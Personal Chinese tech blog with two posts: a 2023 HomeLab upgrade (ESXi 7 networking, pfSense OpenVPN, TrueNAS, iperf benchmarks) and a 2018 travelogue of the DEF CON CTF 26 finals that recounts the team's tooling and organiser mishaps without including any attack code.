https://azure.kdays.cn
Azure's Laboratory
2023-09-16T10:09:37.000Z
https://azure.kdays.cn/2023/09/16/HomeLab-upgrade/
HomeLab升级笔记
<p>上次写blog还是上次。已经5年没写文章了。本篇文章主要讲讲我HomeLab的设备硬件升级的网络适配篇。主要突出一个能耗与省钱,all in two。</p>
<span id="more"></span>
<h2 id="硬件"><a href="#硬件" class="headerlink" title="硬件"></a>硬件</h2><p>HomeLab搭起来的时候还是2020年5月,当时选了贵出天际的E3-1235Lv5【对我就是大冤种,这里贴一下现在这台NAS上跑的装备购买日期和花销</p>
<table>
<thead>
<tr>
<th>设备</th>
<th>数量</th>
<th>单价(RMB)</th>
<th>购买日期</th>
</tr>
</thead>
<tbody><tr>
<td>E3-1235Lv5/8G/U-NAS八盘位/Asrock ITX C236 WSI</td>
<td>1</td>
<td>3300</td>
<td>2020/4/27</td>
</tr>
<tr>
<td>16G ECC UDIMM 2400MHz</td>
<td>2</td>
<td>560</td>
<td>2020/4/28</td>
</tr>
<tr>
<td>HGST_HUS728T8TALE6L4 8T</td>
<td>3</td>
<td>1169.65</td>
<td>2020/4/29</td>
</tr>
<tr>
<td>ST4000VN008-2DR166 4T</td>
<td>2</td>
<td>812.52</td>
<td>2020/4/29</td>
</tr>
<tr>
<td>x16拆分HPE 530双口10G NVMe x2</td>
<td>1</td>
<td>334</td>
<td>2022/1/24</td>
</tr>
<tr>
<td>980 1TB</td>
<td>2</td>
<td>673.49</td>
<td>2022/4/13</td>
</tr>
<tr>
<td>TPM2-S</td>
<td>1</td>
<td>68</td>
<td>2023/6/6</td>
</tr>
</tbody></table>
<p>最近升级了下HomeLab的硬件配置,主要是平时工作需要开一堆测试环境,1235Lv5 4C4T的可用CPU资源低的可怜,32G的内存开了16G给freenas以后就剩下16G可以开虚拟机,也是到处捉襟见肘,众所周知vCenter跑起来咋说也得12G内存,这玩意跑在之前的HomeLab上还是太痛了。于是买了<a href="https://www.mi-d.cn/1897">tank家的D-1581</a>。</p>
<table>
<thead>
<tr>
<th>设备</th>
<th>数量</th>
<th>单价(RMB)</th>
<th>购买日期</th>
</tr>
</thead>
<tbody><tr>
<td>Mellanox OCP 单口10G</td>
<td>1</td>
<td>119</td>
<td>2022/1/24</td>
</tr>
<tr>
<td>980 Pro 2TB</td>
<td>1</td>
<td>1049</td>
<td>2023/4/17</td>
</tr>
<tr>
<td>Tank6盘位机箱电源套装</td>
<td>1</td>
<td>1039</td>
<td>2023/9/6</td>
</tr>
<tr>
<td>Tank D-1581 板U套装</td>
<td>1</td>
<td>669</td>
<td>2023/9/6</td>
</tr>
<tr>
<td>32G SK RECC 2666MHz</td>
<td>4</td>
<td>190</td>
<td>2023/9/7</td>
</tr>
</tbody></table>
<p>由于这个主板不支持独立TPM,另外功耗也稍微高一点,这两个设备算是优势互补了,所以要把这两个设备都用起来。从垃圾山里掏出了当年买的坏过一次的nvme MLC 256G ssd用作系统盘,这东西购买日期太久远了,价格可以忽略不计了。不得不吐槽一下国产之光长江存储是真的生猛,现在4T的pcie4 NVME都可以1032块拿下,太离谱了。我再等等,反正现在存储需求增长稳定,没啥大量新增的需求,估计能等到SATA的ssd铺货组全闪NAS。</p>
<h2 id="网络拓扑"><a href="#网络拓扑" class="headerlink" title="网络拓扑"></a>网络拓扑</h2><h3 id="Machine1-1235Lv5"><a href="#Machine1-1235Lv5" class="headerlink" title="Machine1 1235Lv5"></a>Machine1 1235Lv5</h3><p><img src="/uploads/2023/09/1vswitch_image.png" alt="vSwitch"><br><img src="/uploads/2023/09/1vswitchbackup_image.png" alt="vSwitchBackup"><br>主板上有两个1GbE口,就用作万一网坏了的情况下的备胎口</p>
<h3 id="Machine2-D-1581"><a href="#Machine2-D-1581" class="headerlink" title="Machine2 D-1581"></a>Machine2 D-1581</h3><p><img src="/uploads/2023/09/2vswitch_image.png" alt="vSwitch"><br>因为我把usb网卡拔了所以没有uplink,有临时需要插上去就可以了</p>
<h3 id="Distributed-vSwitch"><a href="#Distributed-vSwitch" class="headerlink" title="Distributed vSwitch"></a>Distributed vSwitch</h3><p><img src="/uploads/2023/09/dswitch_image.png" alt="dSwitch"><br>其中TrueNAS是在Machine1的,vCenter是在Machine2的。配置方法后面再展开说。</p>
<h2 id="ESXi-7"><a href="#ESXi-7" class="headerlink" title="ESXi 7"></a>ESXi 7</h2><p>首先,ESXi6.7 已经彻底EoL了,退一步用ESXi6.7从而利用上D1581主板的3个2.5GbE肯定是行不通的,这风险我是承担不起,虽然能通过运维手段把这玩意塞到封闭网段尽量降低被日可能性,但是被打出虚拟机逃逸的可能性依然不是0,那就还是算了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">To help customers with that transition, we are extending the general support period for vSphere 6.7. Originally, vSphere 6.7 was scheduled to reach EoGS (End of General Support) on November 15, 2021. We are extending this date by 11 months, to October 15, 2022.</span><br></pre></td></tr></table></figure>
<p>那么要解决的问题就是如何用一张单口OCP10G卡和双口10G HPE530达成跨两个设备的实验环境组网。</p>
<h3 id="Fling-USB-Network-Native-Driver-for-ESXi"><a href="#Fling-USB-Network-Native-Driver-for-ESXi" class="headerlink" title="Fling USB Network Native Driver for ESXi"></a>Fling USB Network Native Driver for ESXi</h3><p>因为<code>Realtek Semiconductor Co., Ltd. RTL8125 2.5GbE Controller</code> 在6.7以前是通过<code>vmklinux</code>兼容层实现的,这个在7被从kernel里删除了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">That depends on whether the driver type is “vmklinux” or “native” as the support for “vmklinux” drivers was removed in ESXi 7.</span><br></pre></td></tr></table></figure>
<p>所以只能退一步用Fling的USB网卡。但是用了一天发现这东西十分不稳定,我也不知道是不是因为太热了,只要数据传输量大了时间长了他就直接掉设备摆烂,那这玩意就只能作为一个网卡的备份,如果临时有需求了再插上去。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">2023-09-15T14:55:47.593Z cpu12:2097798)WARNING: vmkusb_nic_fling: udev 0x430e91281248, endpoint 0x82: invalid state 5: Failure</span><br><span class="line">2023-09-15T14:55:47.613Z cpu7:2097797)uether_ifdetach: saved ue_unit as 0 ue->cached_mac 00:0e:c6:d2:fe:08</span><br><span class="line"></span><br><span class="line">2023-09-15T14:55:47.613Z cpu7:2097797)DMA: 732: DMA Engine 'vusb0-dma-engine' destroyed.</span><br><span class="line">2023-09-15T14:55:47.613Z cpu7:2097797)NetPort: 1810: disabled port 0x8600000f</span><br><span class="line">2023-09-15T14:55:47.613Z cpu12:2114655)NetSched: 725: vusb0-0-tx: worldID = 2114655 exits</span><br><span class="line">2023-09-15T14:55:47.613Z cpu7:2097797)WARNING: World: vm 2114652: 3819: vm not found</span><br><span class="line">2023-09-15T14:55:47.613Z cpu7:2097797)WARNING: vmkusb_nic_fling: failed to destroy world 2114652: Not found</span><br></pre></td></tr></table></figure>
<p>可以从这里下载<br><a href="https://flings.vmware.com/usb-network-native-driver-for-esxi">https://flings.vmware.com/usb-network-native-driver-for-esxi</a></p>
<p>安装说明也在上面的链接里</p>
<h3 id="pfSense"><a href="#pfSense" class="headerlink" title="pfSense"></a>pfSense</h3><p>用来暴露在外面,比之前新开了一个openvpn的服务,这样可以从家里连到这里面直接操作里面的ip,就用不着额外再开一台vm做转发了。也不用每开一台vm就需要额外加一条forward规则,nat规则太多到最后自己都记不住哪个端口是哪台机器的。<br><img src="/uploads/2023/09/ovpnserver.png" alt="ovpnserver"><br>pfsense自带openvpn server,用起来还是挺方便的。<br>openvpn生成配置里需要改的两个地方是<code>IPv4隧道网络</code>和<code>IPv4本地网络</code>我这里分别是<code>192.168.254.0/24</code>和<code>192.168.0.0/16</code>。可以选择使用向导生成然后把验证方式改成TLS only【一个人用搞什么ACL控制<br><img src="/uploads/2023/09/pfsense1.png" alt="pfsense opt"><br><img src="/uploads/2023/09/pfsense2.png" alt="pfsense plug"><br>这里需要去插件里面装一个openvpn-client-export的插件,要不然没法生成配置。</p>
<p>证书这边,需要一个ca,然后用这个ca签两个证书,一个是server的一个是client的<br><img src="/uploads/2023/09/pfsensecert1.png" alt="pfsense cert1"><br><img src="/uploads/2023/09/pfsensecert2.png" alt="pfsense cert2"><br>然后VPNServer配置那边关联一下ca签出来的server的证书,这个时候再去看client export就有个可以导出的client证书了<br><img src="/uploads/2023/09/ovpnserver2.png" alt="ovpn server2"><br>防火墙那边记得放通WAN对应的UDP端口和OpenVPN interface的流量。</p>
<p>下载下来就可以直接用了。<br><img src="/uploads/2023/09/ovpnclient.png" alt="ovpnclient"></p>
<h3 id="TrueNAS-scale"><a href="#TrueNAS-scale" class="headerlink" title="TrueNAS scale"></a>TrueNAS scale</h3><p>监听两个IP,一个在1235Lv5的Bridge区,一个在vSwitch的trusted vlan。监听俩IP的主要原因是pfsense的NAT转发效率低下,我最多就只能跑到140MB/s,但是同vlan下能跨两个设备的VM传输SMB数据能跑到700MB/s,对我来说足够用了。Bridge区的IP可以不监听ssh,把ssh开到trusted的vlan上。这样安全性又提升了。</p>
<h2 id="vCenter-7"><a href="#vCenter-7" class="headerlink" title="vCenter 7"></a>vCenter 7</h2><p>在datacenter里添加一个<code>Distributed Switch</code><br><img src="/uploads/2023/09/dswitch00.png" alt="dswitch00"><br><img src="/uploads/2023/09/dswitch01.png" alt="dswitch01"><br><img src="/uploads/2023/09/dswitch02.png" alt="dswitch02"><br>两台机器网卡不一样,推荐一个一个添加,这样不容易搞混,最终成品就是参考上面拓扑图<br><img src="/uploads/2023/09/dswitch03.png" alt="dswitch03"><br>然后到两台机器到的configure页面给这边添加一个新的vmkernel卡,然后把它连到分布式虚拟交换机(Distributed vSwitch)的trusted vlan里<br>这样vcenter/esxi1/esxi2的管理IP就全都收到了trusted vlan里,可以通过先拨vpn再访问的方式进行管理【安全性又上了一个台阶。</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>至此硬件软件升级都已完成,两台esxi间是万兆互联,外部连machine2的vm速度也不含糊。是躺着测速的时候了。</p>
<h3 id="machine2-vm-machine1-vm"><a href="#machine2-vm-machine1-vm" class="headerlink" title="machine2 vm-> machine1 vm"></a>machine2 vm-> machine1 vm</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">Connecting to host 192.168.10.2, port 5201</span><br><span class="line">[ 5] local 192.168.10.29 port 60000 connected to 192.168.10.2 port 5201</span><br><span class="line">[ ID] Interval Transfer Bitrate Retr Cwnd</span><br><span class="line">[ 5] 0.00-1.00 sec 1.01 GBytes 8.64 Gbits/sec 884 1.32 MBytes </span><br><span class="line">[ 5] 1.00-2.00 sec 1.06 GBytes 9.12 Gbits/sec 10 1.30 MBytes </span><br><span class="line">[ 5] 2.00-3.00 sec 1001 MBytes 8.40 Gbits/sec 14 1.24 MBytes </span><br><span class="line">[ 5] 3.00-4.00 sec 1.04 GBytes 8.95 Gbits/sec 34 1.27 MBytes </span><br><span class="line">[ 5] 4.00-5.00 sec 1.04 GBytes 8.97 Gbits/sec 3 1.38 MBytes </span><br><span class="line">[ 5] 5.00-6.00 sec 1.06 GBytes 9.13 Gbits/sec 24 1.36 MBytes </span><br><span class="line">[ 5] 6.00-7.00 sec 1.03 GBytes 8.88 Gbits/sec 87 1.18 MBytes </span><br><span class="line">[ 5] 7.00-8.00 sec 1.07 GBytes 9.15 Gbits/sec 14 1.17 MBytes </span><br><span class="line">[ 5] 8.00-9.00 sec 1.02 GBytes 8.77 Gbits/sec 0 1.49 MBytes </span><br><span class="line">[ 5] 9.00-10.00 sec 1.04 GBytes 8.96 Gbits/sec 68 1.32 MBytes </span><br><span class="line">- - - - - - - - - - - - - - - - - - - - - - - - -</span><br><span class="line">[ ID] Interval Transfer Bitrate Retr</span><br><span class="line">[ 5] 0.00-10.00 sec 10.4 GBytes 8.90 Gbits/sec 1138 sender</span><br><span class="line">[ 5] 0.00-10.04 sec 10.4 GBytes 8.86 Gbits/sec receiver</span><br></pre></td></tr></table></figure>
<h3 id="machine2-vm-pfsense-machine1-vm"><a href="#machine2-vm-pfsense-machine1-vm" class="headerlink" title="machine2 vm-> pfsense -> machine1 vm"></a>machine2 vm-> pfsense -> machine1 vm</h3><p>过了一层nat性能直接打2折,有点离谱,但也算正常,想不到啥简单的优化方法,难道能在mtu上做点文章?毕竟vlan多一个802.1q的头,估计包重组了,反正我给pfsense加cpu是没效果的,懒得看了。这也够用了,毕竟外网带宽也就跑到1.2Gbps。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">Connecting to host nas, port 5201</span><br><span class="line">[ 5] local 192.168.30.32 port 42858 connected to nas port 5201</span><br><span class="line">[ ID] Interval Transfer Bitrate Retr Cwnd</span><br><span class="line">[ 5] 0.00-1.00 sec 147 MBytes 1.24 Gbits/sec 24 720 KBytes </span><br><span class="line">[ 5] 1.00-2.00 sec 171 MBytes 1.44 Gbits/sec 11 687 KBytes </span><br><span class="line">[ 5] 2.00-3.00 sec 159 MBytes 1.33 Gbits/sec 1 629 KBytes </span><br><span class="line">[ 5] 3.00-4.00 sec 175 MBytes 1.47 Gbits/sec 22 602 KBytes </span><br><span class="line">[ 5] 4.00-5.00 sec 178 MBytes 1.49 Gbits/sec 6 578 KBytes </span><br><span class="line">[ 5] 5.00-6.00 sec 166 MBytes 1.39 Gbits/sec 1 387 KBytes </span><br><span class="line">[ 5] 6.00-7.00 sec 164 MBytes 1.37 Gbits/sec 0 731 KBytes </span><br><span class="line">[ 5] 7.00-8.00 sec 182 MBytes 1.53 Gbits/sec 1 717 KBytes </span><br><span class="line">[ 5] 8.00-9.00 sec 165 MBytes 1.38 Gbits/sec 3 684 KBytes </span><br><span class="line">[ 5] 9.00-10.00 sec 168 MBytes 1.41 Gbits/sec 18 639 KBytes </span><br><span class="line">- - - - - - - - - - - - - - - - - - - - - - - - -</span><br><span class="line">[ ID] Interval Transfer Bitrate Retr</span><br><span class="line">[ 5] 0.00-10.00 sec 1.64 GBytes 1.40 Gbits/sec 87 sender</span><br><span class="line">[ 5] 0.00-10.05 sec 1.63 GBytes 1.40 Gbits/sec receiver</span><br></pre></td></tr></table></figure>
<h2 id="碎碎念"><a href="#碎碎念" class="headerlink" title="碎碎念"></a>碎碎念</h2><ul>
<li><p>为什么不是ESXi8</p>
<ul>
<li>因为ESXi8把ConnectX3支持干掉了,至少也得上ConnectX4lx的卡。有机会再续吧,毕竟ESXi7的EoL要到2027年4月了,到时候估计网卡的价格也下来了,能不能有家用40G/100G呢?除非那个时候电费打骨折了,要不然我还要考虑下能效问题,毕竟10G的日常体验已经非常不错了。</li>
</ul>
</li>
<li><p>为啥这么久没写文了</p>
<ul>
<li>过去几年发生的事情太多了,写文还是太浪费时间了。就是生活图个乐子吧,希望想抄作业的同学看完能少走些弯路。</li>
</ul>
</li>
</ul>
2023-09-16T10:09:37.000Z
https://azure.kdays.cn/2018/09/07/DEF-CON-CTF-26-Final/
DEF CON CTF 26 Final之旅
<p>又是一年拉斯维加斯。</p>
<span id="more"></span>
<h1 id="游记任务(1-1)"><a href="#游记任务(1-1)" class="headerlink" title="游记任务(1/1)"></a>游记任务(1/1)</h1><p>什么,问我为什么现在才写?<br><img src="/uploads/2018/09/def26_2.png"><br>其实早就打算这次要写点什么东西,纪念一下。谁知道比赛结束后看到ooo说要放第三天记分板,就想等到记分板出了一起写。<br><img src="/uploads/2018/09/def26_1.png"></p>
<p>我等的花都谢了……这都一个月了,准备先写一个_(:з」∠)_毕竟……感觉再不写很多细节都要忘记了lol<br><a href="http://maskray.me/blog/2018-08-13-defcon-26-ctf">DEFCON 26 CTF参赛记 from MaskRay</a><br><a href="https://ddaa.tw/defcon_26_other_summary.html">DEFCON 26 CTF final summary from ddaa</a><br>友情链接递茶和hitcon两位大佬的游记,总结的都很赞,题目部分我就不重复分析了,这里只记述一下我这几天看到的DEFCON CTF见闻。</p>
<h1 id="序章"><a href="#序章" class="headerlink" title="序章"></a>序章</h1><p>为了迎接比赛,我这次大概准备了一个多月。从DEF CON23第一次与0ops一起参与DEF CON开始,23那年美签被拒,DEF CON24那年第一次去美国,b1o0p带我经历了CGC并最后取得了第二,DEF CON25 A*0*E第一次出场并在决赛取得了第三的不错的成绩,今年是跟随A*0*E第二年出征DEF CON26。<br>说实在当年能得第三我还是感觉挺意(de)外(yi),因为感觉从前两天的情况没想到第三天能追进前三。<br>这次经过大家两天多的努力,取得了第四名的成绩,今年换了主办方,OOO带来了新的规则,也让King of Hill成为了DEF CON决赛中的重要一环。<br>OOO的新规则要求大家在攻防与KoH这三项中不能有短板项目,明显能感觉到OOO为了攻防赛一直广为诟病的积分规则上做了一些努力,总的来说比赛体验还可以,但是相比往年的DEF CON CTF只能说……<br>因为KoH平时很少出现在我们参加的决赛中,所以,哪怕两年参加SECCON的记忆全是每次KoH都被各种吊打,可是仍旧没有重视起来。最终求锤得锤求死得死,再次吃了KoH的亏<br>不过,这次DEF CON CTF应该是我参加DEF CON以来感觉最充实的一次。</p>
<h1 id="赛前准备"><a href="#赛前准备" class="headerlink" title="赛前准备"></a>赛前准备</h1><p>为了比赛需要,我花了一个月的时间准备协作平台Polaris和自动攻击系统Railgun。<br>写这套系统最初的想法是为了解决以前使用CTFPad和之前的自动攻击系统运维难度大,CTFPad不是自己开发的,踩了坑以后修理耗时太长,所以在今年4月底的时候和@LyleCrash一起用Python写了协作平台Polaris,后来@spacemeowx2 重构了前端,在经历了Plaid CTF和DEF CON CTF Quals以后暂时宣告完成。<br>7月初和实习生@wangyihanger用golang参照RESTful API标准重构了协作平台的基础部分,后来我又重构了websocket部分和写了整个攻防部分需要的逻辑,7月下半月的时候@zsxsoft加入我们,再次重构了前端并添加了攻防部分需要的前端功能。7月底的时候@septyem为协作平台添加了IDA简单协作逆向的功能。两个喜爱炮姐的人@LyleCrash和我在这段时间写了Railgun作为比赛时用的自动攻击系统,@wangyihanger 写了第一版Python版的自动提交,后来@LyleCrash和我又对这个python版改了不少内容,基本完成。<br>比赛的时候我主要负责在现场运维两台NUC和VPS服务器以及上面的服务。<br>不过,比赛第一天发现这个版本还是有坑,不得不在开始后第一天晚上用nodejs又重写了一个自动提交的脚本。</p>
<h2 id="8月7日"><a href="#8月7日" class="headerlink" title="8月7日"></a>8月7日</h2><p>赛前准备基本上榨干了我,那时候太忙了,以至于忙到压根没时间查看邮箱,凌晨要睡觉的时候才看到ooo发来的一封邮件,翻了一下发现了上一封是快一个星期以前发来的关于一些规则和现场情况的说明,还好只是一些无关紧要的规则,然后赶紧发到了群里。这时候我们才知道比赛的具体时间是PDT 8月10 早上10AM-8PM 11日10AM-8PM 12日10AM-2PM<br>(╯‵□′)╯︵┻━┻太匆忙了时间根本不够好不好!</p>
<h2 id="8月8日"><a href="#8月8日" class="headerlink" title="8月8日"></a>8月8日</h2><p>当天乘坐加航AC26和AC1898从上海转机温哥华到拉斯维加斯。<br>温哥华直接转美国入境体验还是不错的,排队的人几乎没有,比起让人emmm的长队这种不用排队实在是可贵又幸福。美国的入境审查是在加拿大,不用入加拿大境的。不过,其他人几乎没人有加签,所以不太敢从加拿大转机,万一赶不上飞机要过夜,那简直不要太麻烦 ╮(╯_╰)╭<br>下午3:58的时候到达机场,4点50到的酒店,然后在flamingo和law开了一间房,匆匆休息了一下。<br>晚上的时候好多人都集中到达,自动签到机坏了,flamingo楼下的checkin排起了大长队,据说都是打ctf的各国友人,熟悉的面孔也不少。</p>
<h2 id="8月9日"><a href="#8月9日" class="headerlink" title="8月9日"></a>8月9日</h2><p>你以为比赛就是除了比赛时间美滋滋逛街旅游睡大觉么?<br>太天真了孩子,来来来给你们看看我这一天干了啥:<br>0点45,光辉买来了炸鸡和水还有饮料,晚上没吃饭的小伙伴都过来吃了,好在买的够多不用打架,光辉万岁×3!<br>1点,据说checkin那边还在排队,同情一秒钟。<br>好容易到了早上,和@l4wio一起去拿了badge袋子,回来的路上碰到了hitcon的Orange正好也去取badge。<br><img src="/uploads/2018/09/ex_IMG_3685.jpg"><br>中午匆忙吃了点拉面垫吧,路上碰到了TokyoWestern的人并打了招呼。<br>其他时间一!直!在修Polaris的bug以及最后对功能进行一些调整。<br>晚上去套房配了路由,并把另一个路由的配置方法交给了@atiflody ,今年Flamingo房间网络带宽20M,凑合够用的程度。忙好后在套房里开了个小会,我讲了Polaris的用法,@septyem讲了IDA协作组件的用法。<br>本来想弄个直播录给国内的观众,结果发现Youtube直播注册以后要审一天……<br>折腾半天啥用没有,只能灰溜溜回去写文档……</p>
<h2 id="8月10日"><a href="#8月10日" class="headerlink" title="8月10日"></a>8月10日</h2><p>累并快乐着。<br>为了方便队友,折腾到早上4点28写出了一个Polaris的使用说明,可是好像还是有不少同学没去看这个文档,吐血一波。<br>接着说比赛,主办方一开始说是9点入场,然后9点20左右开始按次序叫我们入场……更坑爹的是,因为晚上折腾的太晚,Polaris测试数据库也没清理,进去以后花了一点时间稍微配了下网以后开始分发Polaris的token,再次吐血。<br>而这时候,已经9点45了。<br>可谁知这时忽然出来个坑,我去年的域名用的不是动态解析,让大家绑了一下,然后今年一开始有小部分人访问不到协作的那个markdown文档,这个后来也发现并修正了。<br>话说一开始上来的时候发现了不少Polaris扔到docker里以后外加nginx做转发产生的小坑,都快速的在10点之前修复了。<br>主办方表示十点半通网,这段时间没有公网和内网,网络链接是down的。继续吐血一波。<br>9点55的时候规则被公开在外网上,然后大家开始解读规则,这里其实我们花了半个小时也没把积分规则搞明白……<br>真正搞明白积分规则已经是第二天晚上了。<br>感觉规则方面的把握程度还是差的太远,毕竟有那么多人在线,但是真正愿意去看主办方文档并在群里讨论的却寥寥无几。<br>10点30第一个题目如约而至,名字叫reverse,题目类型是King Of Hill<br>坑爹的是,比赛开网后发现网络爆炸,速度甚至不如酒店的WiFi,延迟爆高无比(╯‵□′)╯︵┻━┻<br>10:45:19 踩了golang并发map的坑,golang在1.6以后map不是线程安全的,但是之前不知道这个问题,然后因为Websocket产生同时读写map造成Polaris崩溃<br>10:50:35,不知道rootcause的@zsxsoft和@wangyihanger 临时用把Polaris开在host上以及修改nginx反代端口的方法重启了Polaris。这段时间我忙于配置赛场OpenVPN没空顾及Polaris运维,@zsxsoft曾经在群里说了一句我理解错了后来因为这东西跑的没啥问题也就先那样了。<br>10点55现场OpenVPN通了<br>11点01的时候修复了Polaris文件上传的问题,nginx bodysize又一次忘记改了。<br>这个时候,我才发现Polaris的docker处于stop状态,看日志发现了golang并行读写map导致崩溃。<br>11点06椒哥做了libc的sig用于reverse<br>啊……感觉再吐血就凉凉了。</p>
<p>11点38现场会周期给scoreboard,不给访问接口,我们的座位离屏幕很远,想要看到记分板很不方便<br>12点,主办方给出了game_state.json,@atiflody翻译了主办方的规则<br>12点30,准备了两台vps跑在现场的网络环境里<br>12点44 @zsxsoft做了第一版scoreboard的前端<br>12点57放了新题poool,然后又收回去了。后来得知是因为主办方被人撸了23333333<br>13点05发现了Polaris跑在了docker外面,然后因为nginx上配了好多acl导致各种神奇的错误,然后又把Polaris重新在跑在了docker里面。<br>13点15,几个Polaris的开发在琢磨主办方这个scoreboard的json到底应该怎么算才是最终得分,这个时候早就把规则丢到了九霄云外,所以完全是在猜计算方法……orz<br><img src="/uploads/2018/09/ex_IMG_3696.jpg"></p>
<p>13点47,新题pointless。@zsxsoft修了scoreboard的一些bug<br>14点08我们才clone好pointless,这时候主办方git可用性非常差,后来主办方把这道题包扔到公网上去了。<br>这期间主办方网络全程爆炸,下载速度大概只有10K~50K不等<br>14点25 楼下网络和服务状态已经比较稳定,我在交代了@LyleCrash一些维护要点以后困得不行去楼上休息了<br>16点23我们现场桌子电源被人踢了(╯‵□′)╯︵┻━┻好在28分恢复电源,VPS是可用的,但是OpenVPN的赛场内网断了,好像没人发现这个事,鸡哥因为断网不方便做KoH在断网期间来了现场<br>17点55我下楼恢复网络,期间OpenVPN与主办方网络断开大概1个半小时,还好这期间没有自动攻击的题目正在运行,要不然就亏大了<br>18点40 @dmxcsnsbh 2+2本地getshell<br>19点12 诞生了第一个攻击flag<br>19点23 exp适配了Railgun,但是发现Railgun打不了,发现拉不下来exp,马上想到是@LyleCrash的token权限不对,然后检查以后果然不对,修了以后缺题目基础配置,马上加上了以后开始打全场,然后发现exp返回的flag都是空的<br>19点35 攻击脚本重新适配了Railgun,可以打全场<br>19点50 reverse下线<br>20点整第一天结束,主办方开会说去年legitbs拿到了1Gbps带宽,他们今年只有20~30Mbps,而且有两倍的队伍,明天9点入场10点开场,KoH会重新算分<br>20点19 讨论提交程序的效率问题,@zsxsoft建议用nodejs重写,@LyleCrash修了好久提交程序的bug,然后我则是花了一些时间用nodejs重写了提交程序。<br>Slipper说之所以一开始上的是KoH是因为攻防的patch管理有bug</p>
<p>总的来说,整个过程非常紧张辛苦,不过偶尔还是有一些好玩的乐趣。<br>碰到了不少朋友:8点45的时候起床和@LyleCrash下楼去现场,电梯里碰到了老熟人Riatre和宋教授,在CTF赛场门前和Tea Delivers的人还有r3kpig的人聊了几句,在Tea Delivers看到了大学同专业的同学wirefish,还是非常开心的。<br>11点11现场开始放东北玩泥巴,感觉这一定要是国人才能懂空耳的乐趣,所以我们一直猜这音乐是slipper选的233333333<br><img src="/uploads/2018/09/ex_IMG_3695.jpg"></p>
<h2 id="8月11日"><a href="#8月11日" class="headerlink" title="8月11日"></a>8月11日</h2><p>依旧是紧张忙碌的时间线。<br>晚上修Polaris bug修了一些,然后大概早上三点左右睡觉了<br>9点28 @zsxsoft优化了Polaris的nginx配置,scoreboard改直接读game_state.json<br>9点57宣布比赛10点半开始<br>10点开队长会,KoH重新算分后递茶和我们分数受到影响,还有说明patch是交了他就check,check完了马上告诉你过没过,不能看别人的patch,所有的patch通过http接口提交,一轮只能交一次,所有的patch需要重新提交。外网带宽升级,一个队10Mbps。<br>10点半宣布延迟到11点开赛<br>10点45的时候尝试了酒店网络,LTE开Wi-Fi,均不好使。<br>10点53网通了,team interface没开<br>11点08看到9架构KoH,11点13开放pointless攻击,主办方说不开2+2,大家做了一晚2+2感觉十分失落,并且这个时候team interface没开,打下来flag也没法交。<br>11点29,KoH9个架构的没有了,稍后又重新出现<br>11点50 Pointless可以连,交互几次就断了,2+2没开<br>11点55主办方说interface有bug在修<br>12点06 hitcon KoH11个arch<br>12点17 主办方宣布patching is alive,但是攻防题目都gg了,说题目30分钟以后上线<br>12点37 2+2开网<br>12点50 pointless开网,连不上。<br>13点新题oooediter<br>13点53发现主办方推flag时间和轮数更新时间不同步<br>14点09主办方表示pointless被d<br>14点15 Polaris开发小组又一次讨论了scoreboard计算方法但是这时候讨论得出的算法还是错的<br>14点38去跟主办方交涉flag推送的问题,主办方说会检查,但是从后面的积分板分析来看,并没有修复<br>14点50 主办方暂时下掉pointless,做此题的同学表示非常愤怒<br>15点28发现不能Exploit不能选多个依赖,后来晚上修bug的时候发现是我优化的时候把exploitid这一列给当成主键了不能重复。这里临时用直接ssh上去拉文件的方法解决了一下,这里因为这个bug oooeditor损失了一些得分,感觉十分遗憾。<br>15点40发现昨晚临时写的js提交脚本bug,15点42的时候修复<br>16点整,主办方宣布2+2退休了,做题同学表示做了一天是个死题,非常坑,然后做pointless的同学说你觉得这题最坑是因为没做pointless<br>16点20 poool放题<br>16点24 椒哥看到了poool没有patch字节限制,简直按捺不住内心的渴望<br>16点47 有同学把VPS玩挂了,重启,oooeditor还能打两个了<br>17点44宣布晚上9点结束<br>18点20新题bew<br>18点25 Flamingo网络挂了<br>19点05 caesars Wi-Fi挂了<br>19点10 poool DEFKOR00T一血<br>19点16 Flamingo网络恢复<br>19点21主办方宣布poool今天只能patch两次<br>19点34 bew打全场<br>19点45 pointless放流量<br>20点20新题目vchat,pointless退休<br>21点比赛结束,主办方诚恳的对pointless可用性问题作了道歉<br>比赛结束后Riatre来吐槽pointless和积分规则</p>
<p><img src="/uploads/2018/09/ex_IMG_3711.png"><br><img src="/uploads/2018/09/ex_IMG_3714.jpg"><br>拉斯维加斯罕见的下了雨,手机上收到了推送的洪水警报和沙尘暴警报</p>
